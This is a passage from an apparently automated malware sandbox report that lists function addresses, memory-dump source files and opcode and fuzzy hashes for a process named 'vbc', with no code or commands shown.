                                                                                                    • Instruction Fuzzy Hash: 93D0C9B424C381AFD246DF54DC51CA7FBAAABC5310B148C8EF8D187652C7669C07CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005273D8 Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2818ff85b30c2b903ed86478365a32f8da20c5ab41a63aed843ea8f2f91857f2
                                                                                                    • Instruction ID: 82cb59debb9e311e8ab8024d2f832b865ae379edcab0e6c3453072609f1e6f7a
                                                                                                    • Opcode Fuzzy Hash: 2818ff85b30c2b903ed86478365a32f8da20c5ab41a63aed843ea8f2f91857f2
                                                                                                    • Instruction Fuzzy Hash: 85D05EB01693805FC3428730CC59842BFA09E4B22074AC2CFD455CF1A3C7298907CB26
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00529DF0 Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ed9ca791380649ce3d800dbbc563f7be15b10d9761723bf1af9c8e291b90fd81
                                                                                                    • Instruction ID: a89227c1b1062474c979d5647f57514791591012b5c18a8ff6e7f0e53b16b59c
                                                                                                    • Opcode Fuzzy Hash: ed9ca791380649ce3d800dbbc563f7be15b10d9761723bf1af9c8e291b90fd81
                                                                                                    • Instruction Fuzzy Hash: E3D0A7652192C08FD30287608C114847F705EA3211719C4D7C044CF292DA258903CB25
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484B018 Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d9580aaff74c3f1931c054a44d38cf2682c5fccd5e45819d66db68b77fda2b0a
                                                                                                    • Instruction ID: 5ad4c1f1800ad477fb035619eaa4ba6ef44b21fde670e0a9d7d6a4333fd98b18
                                                                                                    • Opcode Fuzzy Hash: d9580aaff74c3f1931c054a44d38cf2682c5fccd5e45819d66db68b77fda2b0a
                                                                                                    • Instruction Fuzzy Hash: 91D017722593829FC306CB54C811965BBB1AF86322B18C4AEA448CB266DB399902CB15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F90F0 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cbe8c5d10da8825a46476aceda5391a340793d115e8fd80b51ad59aa9b760bfa
                                                                                                    • Instruction ID: 69e80cb2b203157c360934cc243dbff668854c34e8a759a385e382cd5e871785
                                                                                                    • Opcode Fuzzy Hash: cbe8c5d10da8825a46476aceda5391a340793d115e8fd80b51ad59aa9b760bfa
                                                                                                    • Instruction Fuzzy Hash: C2D0C97190510CAF8B00DFE58D0199EB7F9EB05204B1181A69908D7251FA315F106B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F3110 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: df4bd343d8203b1b33fa8c9fd7bb602b90acde3a49f70330d88a0e1ee71ac09f
                                                                                                    • Instruction ID: f0de0065e4cb347d1b21fd4120f1f2aa7feb44742cd36bdeae731e9cb819c4b7
                                                                                                    • Opcode Fuzzy Hash: df4bd343d8203b1b33fa8c9fd7bb602b90acde3a49f70330d88a0e1ee71ac09f
                                                                                                    • Instruction Fuzzy Hash: 7ED0C97190510CAF8B00DFE58D0199EB7FAEB05214B1181AA9908D7211EA315F106B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F0938 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f71d95a33dbddbbcedda83c31aa38976156807b509c4424b8cacb82a428e1a76
                                                                                                    • Instruction ID: f06e686c42b1f5b0c7a9d8dd432385fc84a63105442887f3062a9b00f98b3000
                                                                                                    • Opcode Fuzzy Hash: f71d95a33dbddbbcedda83c31aa38976156807b509c4424b8cacb82a428e1a76
                                                                                                    • Instruction Fuzzy Hash: 77D0C971A0510CAF8B01DFE5CD0199EB7F9EB05205B1182A69908D7211EE315F106B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F69C8 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9c690237ad48ea21d47dae82819d2e19bdbd11a5b8a4b95aa47e0a7369d6cc10
                                                                                                    • Instruction ID: 74136599b244694be06af3992b2caca91d222cc759a148a81b1547fd29c3767b
                                                                                                    • Opcode Fuzzy Hash: 9c690237ad48ea21d47dae82819d2e19bdbd11a5b8a4b95aa47e0a7369d6cc10
                                                                                                    • Instruction Fuzzy Hash: 89D0522022E3C80FC396C3248C264907F70EA4320432981DFC880CE597D522AA1BD326
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FC9A8 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2b7821a71e11eb8376a6881d2358475b916d563240986b22eaf480ada0df1e71
                                                                                                    • Instruction ID: 19dafe54b20b866da091417c4f4a4e5e1d9d98072d0f8132d640b40b2026e8f4
                                                                                                    • Opcode Fuzzy Hash: 2b7821a71e11eb8376a6881d2358475b916d563240986b22eaf480ada0df1e71
                                                                                                    • Instruction Fuzzy Hash: B3D0C97590510CAF8B00DFE4CD0199EBBFDEB05204F2145A69908E7251EA315F10AB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F0C20 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 46994242b06a121099f60c76b7c40d4370fee0595052f93fdd449acd08ae544e
                                                                                                    • Instruction ID: 791dfdef2de2d46f1e9e002c07bc04b371fa34ecefe6083d0ee25ba7571972c9
                                                                                                    • Opcode Fuzzy Hash: 46994242b06a121099f60c76b7c40d4370fee0595052f93fdd449acd08ae544e
                                                                                                    • Instruction Fuzzy Hash: EBD0A772209A415BC346C210C965A36FBB1DFD6210B14C0AE954987257DE31D803D601
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9430 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 85f3f15d577b963b11cee3b29e0f5ae876dbf22ac7785128f173a0f03c9c8a79
                                                                                                    • Instruction ID: 8779dcf02041ce54da66a784364a23fa209639e51679c1fe9c520625017df3a1
                                                                                                    • Opcode Fuzzy Hash: 85f3f15d577b963b11cee3b29e0f5ae876dbf22ac7785128f173a0f03c9c8a79
                                                                                                    • Instruction Fuzzy Hash: 2AD0C971D1510CEF8B01EFE68D0199EB7FDEB05204B1185A69908D7211EA315F10AB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1CC0 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a4be72fbe6593c9baf5c76790ac9ee6e851ac51262f9d46dd49840bc35eb9a29
                                                                                                    • Instruction ID: abefcdeeb7b915cf5b49f52d5d9494ab2d446ea235e087aa0828cde58386a1b9
                                                                                                    • Opcode Fuzzy Hash: a4be72fbe6593c9baf5c76790ac9ee6e851ac51262f9d46dd49840bc35eb9a29
                                                                                                    • Instruction Fuzzy Hash: 80D0C97190510CAF8B11DFE98D0199EBBF9EB05214B1181E69908D7211EA315F106B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F5D80 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6f5ba67ec518097baaec3f56cb7b402d5756bc6bc44338c6a42c2e1d5fe5a651
                                                                                                    • Instruction ID: 7b62d296f0dc4aa2adcad28ce48abef3779aba8d28988a58942100fabb57945a
                                                                                                    • Opcode Fuzzy Hash: 6f5ba67ec518097baaec3f56cb7b402d5756bc6bc44338c6a42c2e1d5fe5a651
                                                                                                    • Instruction Fuzzy Hash: 78D0C97190510CEF8B01DFE98D8199FB7F9EB45204B1181A69A08D7211EA315F10ABD6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F15A8 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0e2da71ab0f8cb7fa6c7fabee45f0403f8250c0b945a3ef7a247678ecd1560e3
                                                                                                    • Instruction ID: 99402015707098c5e42c1c6e09f7e18b17b17e81391937c3d6942fbb3f88000a
                                                                                                    • Opcode Fuzzy Hash: 0e2da71ab0f8cb7fa6c7fabee45f0403f8250c0b945a3ef7a247678ecd1560e3
                                                                                                    • Instruction Fuzzy Hash: E1D0C97190510CEF8B00DFE98D0199EB7FDEB45214F1181A69908D7211EA315F146B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F364A Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 47d1cf2f8c3485176dd0f3c3f45f8757b769d6f9ae7a4d89df01062d59ffcfe4
                                                                                                    • Instruction ID: 166a652d3f85e328102d9710db54651b841d33bf3c794eac314b7b6c6b77265b
                                                                                                    • Opcode Fuzzy Hash: 47d1cf2f8c3485176dd0f3c3f45f8757b769d6f9ae7a4d89df01062d59ffcfe4
                                                                                                    • Instruction Fuzzy Hash: 6DD0922022E7C45FC382C7348C7A599BF61EE4710876886DFD884DB197DA22990BD356
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FC760 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 80a9ad6216c01f0f0b5c7b51323dcc2aa43484ffbf04a80f09c16bd7550f4c20
                                                                                                    • Instruction ID: 71c3423c9b4e0a06beebd48327fdc4aedcef0886cfdbb236b9b63b0a0d3e64fa
                                                                                                    • Opcode Fuzzy Hash: 80a9ad6216c01f0f0b5c7b51323dcc2aa43484ffbf04a80f09c16bd7550f4c20
                                                                                                    • Instruction Fuzzy Hash: 63D0C97190510CAF8B00DFE5CD4199EBBF9EB05204B1141B6A908D7211EA315F106B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FB730 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9f1fe3b144e2a15d89ff3cd493d54916dd9a52803344f24ff0d61e55913c79f0
                                                                                                    • Instruction ID: caaa72d135855bbe003b05e93d00a337067a2e0d7f9a4246e4decbfe781c5964
                                                                                                    • Opcode Fuzzy Hash: 9f1fe3b144e2a15d89ff3cd493d54916dd9a52803344f24ff0d61e55913c79f0
                                                                                                    • Instruction Fuzzy Hash: 0DD0C97190510CEF8B00DFE48D0199EBBF9EB05204B1145A6A908D7211EA315F106B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005410F1 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0d26896fdf6e7ca65c6f9e139624260c11747b070e2b05c2334cce991fddbef
                                                                                                    • Instruction ID: 430dc9909bc5c80cb291defb2df41a314004843f5d94139ae143a7a770a109fb
                                                                                                    • Opcode Fuzzy Hash: a0d26896fdf6e7ca65c6f9e139624260c11747b070e2b05c2334cce991fddbef
                                                                                                    • Instruction Fuzzy Hash: 45D017B420C7C09FC202DB249860B96FFE1AFC6208F088C8EE8D603242C621A81ACB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00540848 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2992e24253fbb246e8472ebae7ff7ff97b3126ce60db9fa11cf74858c7e61130
                                                                                                    • Instruction ID: 5c767a7ea3a18fb45056a75ac661d1cd539f45110f3fef98718bc5d6ca2f2795
                                                                                                    • Opcode Fuzzy Hash: 2992e24253fbb246e8472ebae7ff7ff97b3126ce60db9fa11cf74858c7e61130
                                                                                                    • Instruction Fuzzy Hash: 53D0C96029E3C02FC346C7648C66985BF79AA53224318C4DFE884EB297DA698C17C362
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00540B58 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 98cf12294959be65cc79b20a3390a6fbe1ede5114b0411313baa46aebb450678
                                                                                                    • Instruction ID: b403b6d2b32a95fad09aaae2b88d49082dd4d0d1f203371310013c1980a069b6
                                                                                                    • Opcode Fuzzy Hash: 98cf12294959be65cc79b20a3390a6fbe1ede5114b0411313baa46aebb450678
                                                                                                    • Instruction Fuzzy Hash: 32D0C97590510CEF8B00DFE48D0199EBBFDEB05204B1145A6D908D7211EA315F146B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00540F8A Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 26e7ebf0c5e74854758559b811098f0fb468cbeb89dbe586155ab5ef0d454aa5
                                                                                                    • Instruction ID: ecde2b9e5f4c21a9a3d6443fe2b0bd4e1fadee8015a47fc169e7940b6be6a787
                                                                                                    • Opcode Fuzzy Hash: 26e7ebf0c5e74854758559b811098f0fb468cbeb89dbe586155ab5ef0d454aa5
                                                                                                    • Instruction Fuzzy Hash: F7D05EB6A0C2519FC301CF40E920E1ABBB29FD5600F15849EF84017292C622DC06C763
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00522150 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d29a27b8c356614f9a6cca69968e47206621543389ecc7e60f5cf0ca7ed2e4f5
                                                                                                    • Instruction ID: d3d9da92c9a32c9e26be9ed1465b36eba818b16217e107c29cb554e8781bd899
                                                                                                    • Opcode Fuzzy Hash: d29a27b8c356614f9a6cca69968e47206621543389ecc7e60f5cf0ca7ed2e4f5
                                                                                                    • Instruction Fuzzy Hash: B1D0C971D0520CAF8B40DFE48D0199FBBF9EB05204B1141A69908D7211EE325F106B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00529BF0 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 003c1bc5bcb2940f400d45d88dbe6e52870632c67654fa22359f20ce8bf138df
                                                                                                    • Instruction ID: d48c17ae387c76dfef928d792ffd11948ceb564ff360d8c0413f43d12669a7f0
                                                                                                    • Opcode Fuzzy Hash: 003c1bc5bcb2940f400d45d88dbe6e52870632c67654fa22359f20ce8bf138df
                                                                                                    • Instruction Fuzzy Hash: 2AD0C97190510CAF8B00DFE48D0199EBBF9EB05204B1145B69908D7211EA315F10AB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052CCD0 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e24c7e6eefbb9ac7938ca93dfcec0ea53682a278d1922bee87375808f4c24006
                                                                                                    • Instruction ID: 0dbf4217ca751e24c8c4edc0e647a871647414f800a5e8b0a3ff6566f6d0f6a0
                                                                                                    • Opcode Fuzzy Hash: e24c7e6eefbb9ac7938ca93dfcec0ea53682a278d1922bee87375808f4c24006
                                                                                                    • Instruction Fuzzy Hash: D2D0C9B190510CAF8B00DFE48D0199EBBF9EB05204B1141E69A08D7211EA315F60AB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528590 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 959b710d95544b07a18d0e307f7f5012ab2b458e5d35ab74e6eccce9ac4cdf54
                                                                                                    • Instruction ID: bff5f1b2b3fa25b1409eb91e77366af767dd188ca6e508cf429c078ac6a743d8
                                                                                                    • Opcode Fuzzy Hash: 959b710d95544b07a18d0e307f7f5012ab2b458e5d35ab74e6eccce9ac4cdf54
                                                                                                    • Instruction Fuzzy Hash: E3D0C97190510CAF8B01DFE48D0199EBBF9EB05204B1142AA9A08D7211EA315F146B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052EEC0 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8a2887f7b3861b499dd1740139271c074658dd577aca25dbb34383a68741606e
                                                                                                    • Instruction ID: d46f85214b4314e79c261d437d0abba8fb616ad84259a1888044f5b3c84d8e47
                                                                                                    • Opcode Fuzzy Hash: 8a2887f7b3861b499dd1740139271c074658dd577aca25dbb34383a68741606e
                                                                                                    • Instruction Fuzzy Hash: A7D0C9722081615F8254CA59E950D6BFBED9FCD910B18888FB494D3241C965DD06CBB2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528EA0 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 389f3f2785174feba0b6e7ccb9fe3185fb3f74f8f33ef7d919eb3530b058f5b3
                                                                                                    • Instruction ID: b398e1d1e9c7c9c889685f07c11acdd3394ec7ee95a34d5fae590662d6559d9f
                                                                                                    • Opcode Fuzzy Hash: 389f3f2785174feba0b6e7ccb9fe3185fb3f74f8f33ef7d919eb3530b058f5b3
                                                                                                    • Instruction Fuzzy Hash: 4CD0C97190510CAF8B00DFE48D0199FBBF9EB05204B1141A69908D7211EE325F506B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00525F31 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d8493c8a3029f60e5c8dd45f0eb73c65b820aabbff71f5278f97d31e50dda273
                                                                                                    • Instruction ID: c390ae5d50218ba92a7333c3c2c50c88fdf7c804579d5001cdeded4c730ede5d
                                                                                                    • Opcode Fuzzy Hash: d8493c8a3029f60e5c8dd45f0eb73c65b820aabbff71f5278f97d31e50dda273
                                                                                                    • Instruction Fuzzy Hash: 1ED05E5065E3C05FC306C7204C778457F654A4310031984DFD440CB1A7D92A8807C322
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00265040 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6a93cac6a4c91645a0bbe877baada9eec3525a164dfceb6dd37ff5e427f75033
